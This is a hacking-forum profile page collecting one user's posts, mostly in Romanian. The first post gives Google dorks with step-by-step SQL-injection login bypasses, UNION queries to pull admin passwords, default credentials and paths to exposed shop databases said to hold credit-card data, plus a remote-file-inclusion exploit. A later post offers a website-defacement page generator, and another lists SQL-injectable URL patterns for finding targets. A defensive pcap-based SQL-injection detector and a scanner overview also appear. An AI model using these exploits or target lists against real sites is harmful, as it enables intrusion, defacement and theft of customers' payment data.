Jump to content

LegioNRST

Active Members
 View Profile  See their activity

  • Posts

    225

  • Joined

  • Last visited

 Content Type 

Everything posted by LegioNRST

  1. LegioNRST
    Most of these are outdated but they can still work if you happen to find a vulnerable site: 1: google dork :--> inurl:"/cart.php?m=" target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view exploit: chage cart.php?m=view to /admin target whit exploit :--> http://xxxxxx.com/store/admin Usename : 'or"=" Password : 'or"=" 2- google dork :--> allinurlroddetail.asp?prod= target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers ) exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb 3- google dork :--> allinurl: /cgi-local/shopper.cgi target looks like :--> http://www.xxxxxx.co....dd=action&key= exploit :--> ...&template=order.log target whit exploit :--> http://www.xxxxxxxx.....late=order.log 4- google dork :--> allinurl: Lobby.asp target looks like :--> www.xxxxx.com/mall/lobby.asp exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb 5- google dork :--> allinurl:/vpasp/shopsearch.asp when u find a target put this in search box Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Jangan lupa untuk mengganti dan nya terserah kamu. Untuk mengganti password admin, masukkan keyword berikut : Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6 login page: http://xxxxxxx/vpasp/shopadmin.asp 6- google dork :--> allinurl:/vpasp/shopdisplayproducts.asp target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx exploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'- if this is not working try this ends %20'a%25'-- %20'b%25'-- %20'c%25'-- after finding user and pass go to login page: http://xxxx.com/vpasp/shopadmin.asp 7- google dork :--> allinurl:/shopadmin.asp target looks like :--> www.xxxxxx.com/shopadmin.asp exploit: user : 'or'1 pass : 'or'1 8- google.com :--> allinurl:/store/index.cgi/page= target looks like :--> http://www.xxxxxx.co....short_blue.htm exploit :--> ../admin/files/order.log target whit exploit :--> http://www.xxxxxxx.c....iles/order.log 9- google.com:--> allinurl:/metacart/ target looks like :--> www.xxxxxx.com/metacart/about.asp exploit :--> /database/metacart.mdb target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb 10- google.com:--> allinurl:/DCShop/ target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt 11- google.com:--> allinurl:/shop/category.asp/catid= target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx exploit :--> /admin/dbsetup.asp target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb) target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this) in db look for access to find pass and user of shop admins. 12- google.com:--> allinurl:/commercesql/ target looks like :--> www.xxxxx.com/commercesql/xxxxx exploit :--> cgi-bin/commercesql/index.cgi?page= target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log 13- google.com:--> allinurl:/eshop/ target looks like :--> www.xxxxx.com/xxxxx/eshop exploit :-->/cg-bin/eshop/database/order.mdb target whit exploit :--> http://www.xxxxxx.co....base/order.mdb after dl the db look at access for user and password 14- 1/search google: allinurl:"shopdisplayproducts.asp?id= --->http://victim.com/shopdisplayproducts.asp?id=5 2/find error by adding ' --->http://victim.com/shopdisplayproducts.asp?id=5' --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467 -If you don't see error then change id to cat --->http://victim.com/shopdisplayproducts.asp?cat=5' 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match...... 4/ add 2,3,4,5,6.......until you see a nice table add 2 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password then 3 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password ...5,6,7,8,9.... untill you see a table. (exp:...47) ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password ---->see a table. 5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password 6/Find link admin to login: try this first: http://victim.com/shopadmin.asp or: http://victim.com/shopadmin.asp Didn't work? then u have to find yourself: add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password you'll see something like: ( lot of them) shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp .............. then guess admin link by adding the above data untill you find admin links 15- Type: VP-ASP Shopping Cart Version: 5.00 Dork = intitle:VP-ASP Shopping Cart 5.00 You will find many websites with VP-ASP 5.00 cart software installed Now let's get to the exploit.. the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp The exploit is : diag_dbtest.asp so do this: ****://***.victim.com/shop/diag_dbtest.asp A page will appear with something like: xDatabase shopping140 xDblocation resx xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:. the most important thing here is xDatabase xDatabase: shopping140 ok now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb if you didn't download the Database.. Try this while there is dblocation. xDblocation resx the url will be: ****://***.victim.com/shop/resx/shopping140.mdb If u see the error message you have to try this : ****://***.victim.com/shop/shopping500.mdb download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com inside you should be able to find credit card information. and you should even be able to find the admin username and password for the website. the admin login page is usually located here ****://***.victim.com/shop/shopadmin.asp if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are Username: admin password: admin OR Username: vpasp password: vpasp 16- Sphider Version 1.2.x (include_dir) remote file inclusion # Sphider Version 1.2.x (include_dir) remote file inclusion # script Vendor: http://cs.ioc.ee/~ando/sphider/ # Discovered by: IbnuSina found on index.php $include_dir = "./include"; <--- no patch here $language_dir = "./languages"; include "$include_dir/index_header.inc"; include "$include_dir/conf.php"; include "$include_dir/connect.php"; exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu PS: Nu am sursa.
  2. LegioNRST
    Link: http://jhnet.co.uk/fakeav/virus.htm Singura chestie care v-ar putea da de gol este partea cu "virus.htm" in rest..unii i-au teapa:))
  3. LegioNRST
    Daca iti vine acasa, poti sa nu semnezi.
  4. LegioNRST
    Am navigat putin pe Dell la varamea acum 2 zile si imi place cum merge.
  5. LegioNRST
    Vreau sa imi cumpar un laptop dar aud tot mai multe discutii si nu stiu care sunt bune. Am vazut la un prieten Acer mi-a placut cum merge..Ce laptop imi recomandati?
  6. LegioNRST
    Securitatea unui website este un lucru crucial pentru orice organizatie sau site personal. Este recomandat sa verifici securitatea site-ului deoarece e mai bine sa fi sigur si sa cunosti "gaurile" din website inainte ca un atacator sa le gaseasca si sa le exploateze. De obicei cele mai cunoscute vulnerabiliti ale unei aplicatii web sunt: * SQL Injection * Cross Site Scripting (XSS) * Cross Site Request Forgery (CSRF) * Insecure Session Handling * Session Fixation * Information Disclosure * Header Injection * Insecure Configuration * Weak randomness Odata cu timpul, au aparut multe tool-uri ce au fost dezvoltate pentru a furniza o mai buna securitate prin descoperirea diverselor vulnerabilitati. Un vulnerability scanner este creat cu scopul de a detecta "gaurile". Unele dintre aceste tool-uri au si ceva sugestii pentru metode de prevenire ce ar putea fi implementate. Motivul principal pentru care preferam tool-uri automatice, este deoarece procesul de exploatare manual poate duce la rezultate incorecte ce pot cauza ravagii aplicatiei. Un numar foarte mare de aplicatii de scanare sunt disponibile, comercial sau opensource. Ex: * Websecurify * Net Sparker Community Edition *WSSA *NStalker *W3af *Acunetix 1. Websecurify Websecurify este un tool disponibil pe Windows, Linux sau MAC. Este cel mai bun tool cand vine vorba de vulnerabilitatile obisnuite. Odata ce target-ul a fost scanat, tool-ul incepe sa lucreze si prezinta rezultatele odata ce a terminat. Rezultatul scanarii va contine descriere vulnerabilitatii, solutii si URL-ul ce este vulnerabil, ce ne ajuta sa intelegem si sa fixam vulnerabilitatea cat de repede posibil. Exemplu rezultat: Poate detecta vulnerabilitati precum SQLi, LFI/RFI, XSS, CSRF si alte categorii din OWASP top 10. Acest tool are de asemenea o versiune a scanner-ului online. Link: http://scanner.websecurify.com/ Nota: Scannerul online este inca beta. Caracteristici: * Usor de folosit * Testari simultane * Rapoarte avansate 2 - NetSparker http://www.mavitunasecurity.com/netsparker/ NetSparker este de altfel un eficient vuln scanner pentru website-uri, foarte usor de utilizat. Pentru a incepe scanarea, apesi optiunea "Start New Scan" apoi bagi URL-ul tinta, dupa care apesi start scan pentru a scana site-ul. Vei vedea 3 tab-uri, vulnerability, browser view and Http request/response. In tab-ul vulnerability, poti gasi informatii despre URL-ul vulnerabil, descriere, impactul pe care il are si cum se poate fixa. Poti vedea diagrama vulnerabilitatii pentru a intelege cat de serioasa este problema. Caracteristici: * Post exploitation trece exploatarea la nivelul urmator * Avem in constitutia scannerului encoder. * Avem optiune pentru scanare controlata. Web Security Audit - WSSA URL: Web Site Security Audit - WSSA by Beyond Security Dincolo de securitate, scannerele bune de vulnerabilitati web, au integrate de asemenea scanarea retelelor. WSSA vine cu Automated Vulnerability Detection System (AVDS) concentrat pe acuratete. O problema in scanarea aplicatiilor web este 'fals pozitivul'. Sunt multe scannere care iti vor da o lista lunga de posibile vulnerabilitati, dintre care unele mai mult sau mai putin prezente. Testarea host-ului tine mai mult de penetration testing. Verificarea versiunii ce isi va asuma vulnerabilitatea, este de obicei inexacta. Pentru mai multe informatii despre aceste doua metode de testare. In acelasi timp, unele scannere au rata de fals pozitiv de 10 %. Multe dintre ele chiar 3%. AVDS este 1%. Aceasta rata scazuta reduce considerabil din timpul petrecut uitandu`te dupa vulnerabilitati care sunt reportate insa in realitate nu exista. Scanner-ul este numai cu plata, insa poate fi folosit 15 zile trial. Mai mult, acesta vine cu un web scanner ce furnizeaza niste rapoarte foarte detaliate care pot fi intelese usor de catre o persoana normala. Rezultatele sunt primite destul de repede si tot serviciul vine gratis, daca sunteti interesati. Primul pas ar fi, sa intrati pe website Pasul 2: Foloseste email-ul asociat cu domeniul tau. Odata ce ai terminat, vei primi detalii detaliate despre domeniul pe mail-ul specificat. Scannerul online poate detecta cele mai multe dintre vulnerabilitati, cum ar fi paginile codate prost, database connection cu probleme. Exemplu: SQL injection, XSS, RFI, PHP/ASP Code injection, Directory traversal sau File Disclosure. Cu acest serviciu putem identifica rezultatele unui atac cu vurs, trojan sau worm. Exemplu: molicious code ce deschide un port TCT pentru utilizarea fara drept a internetului. Sistemele configurate gresit. Exemplu: un serviciu ce foloseste un user sau parola cunoscute; sau update-uri/patch-uri de securitate omise. Sursa: Insecurity.ro
  7. LegioNRST
  8. LegioNRST
    crezi ca nu as fii pus sursa daca o aveam? am avut scriptul intr-un document vechi.
  9. LegioNRST
    Deface page creator: Use: deface.py yourpage.html [code] import sys import time if len(sys.argv) < 2: print 'Usage deface.py index.html , this will create an index.html file with deface .' sys.exit() file = sys.argv[1] myfile = open(file,'w') print ' Colors: ' print '-----------------------------------------------------------------------------' print ' | black | white | ' print '================================================================' while True: var = raw_input ('1.Type the color for background here => ') if var in ['black','white']: break else: print 'Wrong color..!' print >> myfile, '<body bgcolor=','"',(var),'"','>' print '================================================================' print ' Colors ' print ' | black | white | green | red | purple | blue | gray | ' print '================================================================' while True: var1 = raw_input ('2.Type the text color here => ') if var1 in ['black','white','green','orange','red','purple','blue','gray']: break else: print 'Wrong color..!' print >> myfile, '<p align="center"><b><font color=','"',(var1),'"','size="3">' if var == 'black': print '================================================================' print ' Choose an image : ' print '| hacked1 | fingerprint | spy | hacked2 | silence | gameover |' print '| leg | hand | hitman | smoke | hacked3 | ' print ' | other | ' print '================================================================' while True: var4 = raw_input ('3.Put the image name here => ') if var4 in ['hacked1','fingerprint','spy','hacked2','silence','gameover','leg','hand','hitman','smoke','hacked3','other']: break else: print 'Wrong image name..! ' print '================================================================' if var4 == 'fingerprint': print >> myfile,' <center><img src="http://www.mandel.ro/logos/animFingerprintBlack.gif"></center>' if var4 == 'hacked1': print >> myfile,' <center><img src="http://site.mynet.com/the_chip/hacked2323.jpg"></center>' if var4 == 'spy': print >> myfile,' <center><img src="http://www.bluesilk.hu/images/stories/spy.gif"></center>' if var4 == 'hacked2': print >> myfile,' <center><img src="http://expclan.comli.com/index_files/43084476ii9.png"></center>' if var4 == 'silence': print >> myfile,' <center><img src="http://demafmipauns.files.wordpress.com/2010/05/sayu0i.jpg"></center>' if var4 == 'gameover': print >> myfile, '<center><img src="http://img10.imageshack.us/img10/4974/yumaqalt.jpg"></center>' if var4 == 'leg': print >> myfile, '<center><img src="http://img268.imageshack.us/img268/6802/thehackerericborgozone1.jpg"></center>' if var4 == 'hand': print >> myfile, '<center><img src="http://i728.photobucket.com/albums/ww286/vyc0d/owned.jpg"></center>' if var4 == 'hitman': print >> myfile, '<center><img src="http://t0.gstatic.com/images?q=tbn:lYCsFDr4o7mh1M:http://www.renoascensori.it/hacked.jpg&t=1"></center>' if var4 == 'smoke': print >> myfile, '<center><img src="http://t1.gstatic.com/images?q=tbn:YgDh8qCPAtwgoM:http://i46.tinypic.com/2gtxdo1.jpg&t=1"></center>' if var4 == 'hacked3': print >> myfile, '<center><img src="http://img.webme.com/pic/c/cobbra-g3ncii/hacked.jpg"></center>' if var4 == 'other': while True: var4 = raw_input ('Please enter the URL of your picture here: ' ) if var4.endswith(('.jpg','.png','.gif','.JPG','.PNG','.GIF')) : break else: print 'Wrong image name..! ' print >> myfile,'<center><img src="',(var4),'"></center>' if var == 'white': print '================================================================' print ' Choose an image : ' print ' | eye | door | fingerprint | wanted | sleep | other | ' print '================================================================' while True: var4 = raw_input ('3.Put the image name here => ') if var4 in ['door','fingerprint','wanted','sleep','eye','other']: break else: print 'Wrong image...' print '================================================================' if var4 == 'door': print >> myfile,'<center><img src="http://www.cdscreative.com/images/door.jpg"></center>' if var4 == 'fingerprint': print >> myfile,' <center><img src="http://www.idfpr.com/DPR/images/fingerprint.gif"></center>' if var4 == 'wanted': print >> myfile,' <center><img src="http://www.allstarcardsinc.com/_derived/buy_list.htm_txt_wanted1.gif"></center>' if var4 == 'sleep' : print >> myfile,' <center><img src="http://www.do2learn.com/picturecards/images/imageschedule/sleep_l.gif"></center>' if var4 == 'eye' : print >> myfile,' <center><img src="http://www.christina-reysen.com/images/eye_open.gif"></center>' if var4 == 'other': while True: var4 = raw_input ('Please enter the URL of your picture here: ' ) if var4.endswith(('.jpg','.png','.gif','.JPG','.PNG','.GIF')) : break else: print 'Must enter an URL that contains an image file..! ' print >> myfile,'<center><img src="',(var4),'"></center>' print '================================================================' while True: var2 = raw_input ('4.put your signature here => ') if len(var2) < 30 : break else: print 'Signature too large..!' print >> myfile, '<script>' print >> myfile, 'if (document.layers)' print >> myfile, 'var ns4def=""' print >> myfile, '</script>' print >> myfile, '<p align="center"><b><font size="4">' print >> myfile, '<h2 id="flyin"style="position:relative;left:-400;font-style:italic"' print >> myfile, 'style=&{ns4def};>' print >> myfile, '<font face="Arial">','Owned by',(var2),'</font></h2>' print >> myfile, '</font></b></p>' print >> myfile, '<script language="JavaScript1.2">' print >> myfile, 'if (document.getElementById||document.all)' print >> myfile, 'var crossheader=document.getElementById? document.getElementById("flyin").style : document.all.flyin.style' print >> myfile, 'function animatein(){' print >> myfile, 'if (parseInt(crossheader.left)<0)' print >> myfile, 'crossheader.left=parseInt(crossheader.left)+20' print >> myfile, 'else{' print >> myfile, 'crossheader.left=0' print >> myfile, 'crossheader.fontStyle="normal"' print >> myfile, 'clearInterval(start)' print >> myfile, '}' print >> myfile, '}' print >> myfile, 'if (document.getElementById||document.all)' print >> myfile, 'start=setInterval("animatein()",50)' print >> myfile, '</script>' print >> myfile, '<p>' print >> myfile, '<font face="Tahoma"><a target="_blank"' print '================================================================' print ' Choose: ' print ' | yes | no | ' print '================================================================' while True: var7 = raw_input ('Do you want to add some other text message?: ') if var7.lower() == 'no' : print '================================================================' print ' Wait...' time.sleep(1) myfile.close() print 'Your HTML file is ready ,I will exit now... ' time.sleep(2) sys.exit() elif var7.lower() == 'yes' : break else: print ("Please enter 'yes' or 'no' ...!") print '================================================================' print ' Choose one of the color from the list ' print ' | black | white | green | red | purple | blue | gray | ' print '================================================================' while True: var8 = raw_input ('Type the text color that you want here => ') if var8 in ['black','white','green','orange','red','purple','blue','gray ']:break else: print 'Wrong color..!' print >> myfile, '<p align="center"><b><font color=','"',(var8),'"','size="3">' print '================================================================' while True: var9 = raw_input ('Put your comments here => ') if len(var9) < 150 : break else: print 'Comments are too large..!' print >> myfile, var9 print >> myfile, '</font></b></p>' print '================================================================' print 'Processing your HTML file please wait...' time.sleep(2) print '...' time.sleep(2) myfile.close() print ' Work done ,your HTML file was defaced , i will exit... ' time.sleep(1) sys.exit() #END [/code] http://hotfile.com/dl/61475254/9850a03/def.tar.gz.html SQLInject finder: #!/usr/bin/env python ------------------------------------------------------------------------------- # # sqlinject-finder.py # Description: Simple python script that parses through a pcap and looks at the # GET and POST request data for suspicious and possible SQL injects. # #################################################################################### import dpkt, re, urllib, sys, getopt tab = False #removes inline comments that can sometimes be used for obfuscating the sql def removeComments(val): while True: index = val.find("/*") index2 = val.find("*/") if index != -1 and index2 != -1: #looks like there is some type of SQL obfuscation, let's remove the comments remove = val[index:index2+2] val = val.replace(remove, "") else: break return val #checks for common sql injection tactics using all the variables from post or get data def analyzeRequest(vals, sIP, page, frameno): var = vals[0] #the variable, i.e. in id=1, the var is id val = vals[1] #the value, i.e. in id=1, the val is 1 val = val.decode('ascii') #not sure if this is really doing anything, but we need to deal with non ascii characters for analysis val = urllib.unquote(val) #removes url encodings like %20 for space, etc val = val.replace("+", " ") #sometimes in urls, instead of a space you can have a + . So, we want to remove those for analysis #print val display = [False, sIP, page, var, val] ##### Look for obfuscation techniques ###### index = val.find("/*") if index != -1: display[0] = True display.append("Might be attempting to obfuscate a SQL statement with a comment") val = removeComments(val) ##### Look for commenting out the end of a MSSQL statement ###### index = val.rfind("--") if index != -1: display[0] = True display.append("Might be attempting to end a SQL statement by commenting out the remaining statement") ##### Look for commenting out the end of a MySQL statement ##### index = val.rfind("#") if index != -1: display[0] = True display.append("Might be attempting to end a SQL statement by commenting out the remaining statement") ##### Look for common SQL syntax in the values of a param ##### sqlvals = ("cast(", "declare ", "select ", "union ", "varchar", "set(", "create ", " or ", " NULL,", " concat(") for sql in sqlvals: index = val.lower().find(sql) if index != -1: display[0] = True display.append("Possible use of SQL syntax in variable") break if display[0] == True: if tab: line = str(display[1]) + "\t" + str(display[2]) + "\t" + str(display[3]) + "=" + str(display[4]) + "\t" + str(frameno) for i in range(len(display)-5): line = line + "\t" + str(display[i+5]) print line else: print "Source : " + str(display[1]) print "Page : " + str(display[2]) print "Value : " + str(display[3]) + "=" + str(display[4]) print "Frame : " + str(frameno) for i in range(len(display)-5): print "Reason : " + str(display[i+5]) print "" def octetIP(sIP): ip = "" for s in sIP: ip = ip + str(ord(s)) + "." return ip[:-1] #reads the pcap file and parses out get and post requests for analysis def parsepcap(filename): try: f = open(filename, 'rb') except: print "Error reading file. Please make sure the file exists" sys.exit() try: pcap = dpkt.pcap.Reader(f) except: print "Error reading file. Please make sure the file is a valid pcap file." sys.exit() sIP="" page="" frameno = 1 for ts, buf in pcap: eth = dpkt.ethernet.Ethernet(buf) ip = eth.data #make sure we are dealing with ip (2048) and tcp (proto=6) if eth.type ==2048 and ip.p == 6: tcp = ip.data #assuming http is running on port 80 if tcp.dport == 80 and len(tcp.data) > 0: index = 1 getvals = "" try: http = dpkt.http.Request(tcp.data) url = http.uri #deal with post data if http.method == "POST": getvals=http.body index = url.find("?") if index != -1: page = url[:index] else: page = url #deal with GET data elif http.method == "GET": index = url.rfind("?") if index != -1: getvals = url[index+1:] page = url[:index] except: data = tcp.data index = str(data).find("POST") if index == 0: url = str(data).split(" ") page = url[1] #POST is usually always the second value in the POST index = str(data).count("\n") #need to look into this method a little more, basically, we want to get POST data out of other streams if index == 0: index = str(data).find("=") if index != -1: getvals = str(data) #split up each variable and its cooresponding value if getvals != "": getvals = getvals.split("&") for val in getvals: i = val.find("=") val = (val[:i], val[i+1:]) sIP = octetIP(ip.src) analyzeRequest(val, sIP, page, frameno) frameno += 1 f.close() #usage stuff def usage(): print "" print "This tool parses through a pcap file and looks for potential SQL injection attempts." print "" print "usage: sqlinject-finder.py -f filename [-t]" print "Options and arguments (and corresponding environment variables):" print "-f, --filename : valid pcap file" print "-t, --tab : prints output in tab delimited format" print "-h, --help : shows this screen" print "" print "Example: #python sqlinject-finder.py -f capture.pcap" print " #python sqlinject-finder.py -f capture.pcap -t > capture.tsv" print "" def main(): try: opts, args = getopt.getopt(sys.argv[1:], "f:th", ["filename=", "tab", "help"]) except getopt.GetoptError, err: print str(err) usage() sys.exit(2) filename = "" for o, a in opts: if o in ("-f", "--filename"): filename = a elif o in ("-t", "--tab"): global tab tab = True elif o in ("-h", "--help"): usage() sys.exit() else: usage() sys.exit() if (filename == ""): print "please specify a filename" sys.exit() if tab: print "Source\tPage\tValue\tFrame\tReason(s)" parsepcap(filename) if __name__ == "__main__": main()
  10. LegioNRST
    site:.pk intext:Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in & "id" site:.pk intext:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in & "id" about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.php?ID= catalog_main.php?catid= category.php category.php?catid= category_list.php?id= categorydisplay.php?catid= checkout.php?cartid= checkout.php?UserID= checkout_confirmed.php?order_id= checkout1.php?cartid= comersus_listCategoriesAndProducts.php?idCategory= comersus_optEmailToFriendForm.php?idProduct= comersus_optReviewReadExec.php?idProduct= comersus_viewItem.php?idProduct= comments_form.php?ID= contact.php?cartId= content.php?id= customerService.php?****ID1= default.php?catID= description.php?bookid= details.php?BookID= details.php?Press_Release_ID= details.php?Product_ID= details.php?Service_ID= display_item.php?id= displayproducts.php downloadTrial.php?intProdID= emailproduct.php?itemid= emailToFriend.php?idProduct= events.php?ID= faq.php?cartID= faq_list.php?id= faqs.php?id= feedback.php?title= freedownload.php?bookid= fullDisplay.php?item= getbook.php?bookid= GetItems.php?itemid= giftDetail.php?id= help.php?CartId= home.php?id= index.php?cart= index.php?cartID= index.php?ID= info.php?ID= item.php?eid= item.php?item_id= item.php?itemid= item.php?model= item.php?prodtype= item.php?shopcd= item_details.php?catid= item_list.php?maingroup item_show.php?code_no= itemDesc.php?CartId= itemdetail.php?item= itemdetails.php?catalogid= learnmore.php?cartID= links.php?catid= list.php?bookid= List.php?CatID= listcategoriesandproducts.php?idCategory= modline.php?id= myaccount.php?catid= news.php?id= order.php?BookID= order.php?id= order.php?item_ID= OrderForm.php?Cart= page.php?PartID= payment.php?CartID= pdetail.php?item_id= powersearch.php?CartId= price.php privacy.php?cartID= prodbycat.php?intCatalogID= prodetails.php?prodid= prodlist.php?catid= product.php?bookID= product.php?intProdID= product_info.php?item_id= productDetails.php?idProduct= productDisplay.php productinfo.php?item= productlist.php?ViewType=Category&CategoryID= productpage.php products.php?ID= products.php?keyword= products_category.php?CategoryID= products_detail.php?CategoryID= productsByCategory.php?intCatalogID= prodView.php?idProduct= promo.php?id= promotion.php?catid= pview.php?Item= resellers.php?idCategory= results.php?cat= savecart.php?CartId= search.php?CartID= searchcat.php?search_id= Select_Item.php?id= Services.php?ID= shippinginfo.php?CartId= shop.php?a= shop.php?action= shop.php?bookid= shop.php?cartID= shop_details.php?prodid= shopaddtocart.php shopaddtocart.php?catalogid= shopbasket.php?bookid= shopbycategory.php?catid= shopcart.php?title= shopcreatorder.php shopcurrency.php?cid= shopdc.php?bookid= shopdisplaycategories.php shopdisplayproduct.php?catalogid= shopdisplayproducts.php shopexd.php shopexd.php?catalogid= shopping_basket.php?cartID= shopprojectlogin.php shopquery.php?catalogid= shopremoveitem.php?cartid= shopreviewadd.php?id= shopreviewlist.php?id= ShopSearch.php?CategoryID= shoptellafriend.php?id= shopthanks.php shopwelcome.php?title= show_item.php?id= show_item_details.php?item_id= showbook.php?bookid= showStore.php?catID= shprodde.php?SKU= specials.php?id= store.php?id= store_bycat.php?id= store_listing.php?id= Store_ViewProducts.php?Cat= store-details.php?id= storefront.php?id= storefronts.php?title= storeitem.php?item= StoreRedirect.php?ID= subcategories.php?id= tek9.php? template.php?Action=Item&pid= topic.php?ID= tuangou.php?bookid= type.php?iType= updatebasket.php?bookid= updates.php?ID= view.php?cid= view_cart.php?title= view_detail.php?ID= viewcart.php?CartId= viewCart.php?userID= viewCat_h.php?idCategory= viewevent.php?EventID= viewitem.php?recor= viewPrd.php?idcategory= ViewProduct.php?misc= voteList.php?item_ID= whatsnew.php?idCategory= WsAncillary.php?ID= WsPages.php?ID=noticiasDetalle.php?xid= sitio/item.php?idcd= index.php?site= de/content.php?page_id= gallerysort.php?iid= products.php?type= event.php?id= showfeature.php?id= home.php?ID= tas/event.php?id= profile.php?id= details.php?id= past-event.php?id= index.php?action= site/products.php?prodid= page.php?pId= resources/vulnerabilities_list.php?id= site.php?id= products/index.php?rangeid= global_projects.php?cid= publications/view.php?id= display_page.php?id= pages.php?ID= lmsrecords_cd.php?cdid= product.php?prd= cat/?catid= products/product-list.php?id= debate-detail.php?id= cbmer/congres/page.php?LAN= content.php?id= news.php?ID= photogallery.php?id= index.php?id= product/product.php?product_no= nyheder.htm?show= book.php?ID= print.php?id= detail.php?id= book.php?id= content.php?PID= more_detail.php?id= content.php?id= view_items.php?id= view_author.php?id= main.php?id= english/fonction/print.php?id= magazines/adult_magazine_single_page.php?magid= product_details.php?prodid= magazines/adult_magazine_full_year.php?magid= products/card.php?prodID= catalog/product.php?cat_id= e_board/modifyform.html?code= community/calendar-event-fr.php?id= products.php?p= news.php?id= view/7/9628/1.html?reply= product_details.php?prodid= catalog/product.php?pid= rating.php?id= ?page= catalog/main.php?cat_id= index.php?page= detail.php?prodid= products/product.php?pid= news.php?id= book_detail.php?BookID= catalog/main.php?cat_id= catalog/main.php?cat_id= default.php?cPath= catalog/main.php?cat_id= catalog/main.php?cat_id= category.php?catid= categories.php?cat= categories.php?cat= detail.php?prodID= detail.php?id= category.php?id= hm/inside.php?id= index.php?area_id= gallery.php?id= products.php?cat= products.php?cat= media/pr.php?id= books/book.php?proj_nr= products/card.php?prodID= general.php?id= news.php?t= usb/devices/showdev.php?id= content/detail.php?id= templet.php?acticle_id= news/news/title_show.php?id= product.php?id= index.php?url= cryolab/content.php?cid= ls.php?id= s.php?w= abroad/page.php?cid= bayer/dtnews.php?id= news/temp.php?id= index.php?url= book/bookcover.php?bookid= index.php/en/component/pvm/?view= product/list.php?pid= cats.php?cat= software_categories.php?cat_id= print.php?sid= docDetail.aspx?chnum= index.php?section= index.php?page= index.php?page= en/publications.php?id= events/detail.php?ID= forum/profile.php?id= media/pr.php?id= content.php?ID= cloudbank/detail.php?ID= pages.php?id= news.php?id= beitrag_D.php?id= content/index.php?id= 